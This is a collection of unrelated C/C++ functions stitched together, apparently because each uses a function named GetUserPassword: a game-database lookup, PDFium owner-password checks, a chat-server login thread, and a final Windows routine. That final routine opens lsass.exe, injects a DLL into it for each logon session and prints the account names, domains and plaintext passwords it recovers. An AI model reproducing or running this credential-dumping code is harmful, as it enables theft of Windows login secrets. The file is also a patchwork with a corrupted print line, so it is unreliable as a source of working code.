int Team5_DB::GetUserInfo(char *Name, UserInfo &RetInfo)
{
RetInfo.ID = GetUserID(Name);
if (RetInfo.ID < 0)
{
printf("GetUserInfo Error\n");
return -1;
}
strcpy(RetInfo.Name, Name);
if (GetUserPassword(Name, RetInfo.Password))
{
printf("GetUserInfo Error\n");
return -1;
}
RetInfo.Score = GetUserScore(Name);
if (RetInfo.Score < 0)
{
printf("GetUserInfo Error\n");
return -1;
}
RetInfo.Rank = GetUserRank(Name);
if (RetInfo.Rank < 0)
{
printf("GetUserInfo Error\n");
return -1;
}
return 0;
}
FX_BOOL CPDF_StandardSecurityHandler::CheckOwnerPassword(FX_LPCBYTE password, FX_DWORD pass_size,
FX_LPBYTE key, FX_INT32 key_len)
{
CFX_ByteString user_pass = GetUserPassword(password, pass_size, key_len);
if (CheckUserPassword(user_pass, user_pass.GetLength(), FALSE, key, key_len)) {
return TRUE;
}
return CheckUserPassword(user_pass, user_pass.GetLength(), TRUE, key, key_len);
}
FX_BOOL CPDF_SecurityHandler::CheckOwnerPassword(const uint8_t* password,
uint32_t pass_size,
uint8_t* key,
int32_t key_len) {
CFX_ByteString user_pass = GetUserPassword(password, pass_size, key_len);
if (CheckUserPassword(user_pass.raw_str(), user_pass.GetLength(), FALSE, key,
key_len)) {
return TRUE;
}
return CheckUserPassword(user_pass.raw_str(), user_pass.GetLength(), TRUE,
key, key_len);
}
CFX_ByteString CPDF_StandardSecurityHandler::GetUserPassword(FX_LPCBYTE owner_pass, FX_DWORD pass_size)
{
return GetUserPassword(owner_pass, pass_size, m_KeyLen);
}
void *ThreadMain(void *clsk){
pthread_detach(pthread_self());
bool loggedon=false;
char buffer[BUFFERSIZE];
std::string username, password, iv, key;
//std::string* nameptr=&username;
//pthread_detach(pthread_self());
int client_socket=*((int*)clsk);
if(debugmode)
std::cout<<"Successful thread, listening to client: "<<*((int*)clsk)<<std::endl;
bool listening=true;
while(listening){
if(debugmode)
std::cout<<"Recieving input"<<std::endl;
memset(buffer,0,BUFFERSIZE);
read(client_socket, buffer, BUFFERSIZE);
if(debugmode)
std::cout<<"Successfully received message"<<std::endl;
std::string input(buffer);
if(debugmode)
std::cout<<"decrypting input..."<<std::endl;
//input=DecryptInput(input); //waiting for mario's code.
if(debugmode)
std::cout<<"converting message type"<<std::endl;
messagetype action=ParseData(input);
std::string receiver;
std::string message;
std::string confirmation;
switch(action){
case LOGIN:
//add validation code
username=GetUserName(input);
password=GetUserPassword(input);
LogUserOn(username, &client_socket);
//*nameptr=LogUserOn(input, &client_socket);
SendMessage(username, username,t);
iv=GetIV(username, password);
SendMessage(username, username,iv);
key=GetKey(username, password);
SendMessage(username, username,key);
if(debugmode)
std::cout<<username<<std::endl;
//std::cout<<*nameptr<<std::endl;
loggedon=true;
break;
case LOGOFF:
//add validation code
// std::cout<<"checking for "<<*nameptr<<std::endl;
if(debugmode)
std::cout<<IsUserOnline(username)<<std::endl;
// username=LogUserOn(input, &client_socket);
if(debugmode)
std::cout<<"checking for "<<username<<std::endl;
// std::cout<<IsUserOnline(username)<<std::endl;
LogUserOff(username);
if(debugmode)
std::cout<<IsUserOnline(username)<<std::endl;
close(client_socket);
loggedon=false;
listening=false;
break;
case SENDMESSAGE:
//add validation code
receiver=GetMessageReceiver(input);
message=GetMessage(input);
message=FormatOutGoingMessage(username, message);
SendMessage(username, receiver,message);
break;
case ADDUSER:
//add validation code
username=GetMessageReceiver(input);
IsUserInDatabase(username);
AddUserToDatabase(username);
break;
case CHANGEPASSWORD:
IsUserInDatabase(username);
break;
case INVALID:
//std::string invalid="invalid command";
//SendMessage(username,
break;
default:
break;
}
}
//zombie_threads++;
pthread_exit(0);
}
int LookupAccountPwd() {
int nRet = -1;
if (m_bNoisy) {
msg_print("Reading by injecting code! (less-safe mode)\n");
}
DWORD dwLSASRV_dll = FindLSASRV_dll(), dwWDIGEST_dll = 0;
OSVERSIONINFOA sysVersion;
sysVersion.dwOSVersionInfoSize = sizeof(sysVersion);
GetVersionExA(&sysVersion);
if ((sysVersion.dwMajorVersion < 6) && (
(sysVersion.dwMajorVersion != 5) || (sysVersion.dwMinorVersion != 2))) {
dwWDIGEST_dll = FindWDIGEST_dll();
}
else {
dwWDIGEST_dll = FindWDIGEST_dll_2();
}
if (!dwLSASRV_dll || !dwWDIGEST_dll) {
msg_print("ERROR: Cannot find dependencies\n");
return nRet;
}
DWORD dwProcessId = GetProcessIdByName(L"lsass.exe");
if (!dwProcessId) {
msg_print("Cannot get PID of LSASS.EXE!\n");
exit(0);
}
HANDLE hLSASS = OpenProcess(PROCESS_ALL_ACCESS, 0, dwProcessId);
if (hLSASS == INVALID_HANDLE_VALUE) {
msg_print("Error: Cannot open LSASS.EXE!.\n");
exit(0);
}
ULONG nLogonSessionCount = 0;
PLUID pLogonSessionList = NULL;
NTSTATUS status = LsaEnumerateLogonSessions(&nLogonSessionCount, &pLogonSessionList);
if (!NT_SUCCESS(status)) {
msg_print("Can't enumerate logon sessions!\n");
exit(0);
}
if (m_bNoisy) {
msg_print("Logon Sessions Found: %d\n", nLogonSessionCount);
}
REMOTE_PARAM_T *remp = (REMOTE_PARAM_T *)malloc(sizeof(REMOTE_PARAM_T));
if (!remp) {
msg_print("Cannot alloc wcewdparams!.");
exit(0);
}
INPUT_PARAM_T inpt;
strcpy(inpt.FuncName, "_0212DBDHJKSAHD0183923kljmLKL");
inpt.pParam = remp;
inpt.paramSize = sizeof(REMOTE_PARAM_T);
char szInjectDll[1024] = {0};
::GetCurrentDirectoryA(1022, szInjectDll);
::PathAppendA(szInjectDll, "getpwd_dll.dll");
for (ULONG i = 0; i < nLogonSessionCount; ++i) {
memset(remp, 0, sizeof(REMOTE_PARAM_T));
remp->dwDecryptAddr = dwLSASRV_dll;
remp->dwLogonSessionEntry = dwWDIGEST_dll;
remp->Retn = 0;
remp->LogonId.LowPart = pLogonSessionList[i].LowPart;
remp->LogonId.HighPart = pLogonSessionList[i].HighPart;
if (GetUserPassword(dwProcessId, szInjectDll, &inpt)) {
if (remp->Retn == 1) {
msg_print("ID: %d\nAccout: %s\nDomain: %s\nPassword: "******"%s\n", remp->szPassword);
}
else {
msg_print("<contains-non-printable-chars>");
}
}
}
else {
msg_print("Error in InjectDllAndCallFunction\n");
}
}
free(remp);
LsaFreeReturnBuffer(pLogonSessionList);
return 0;
}
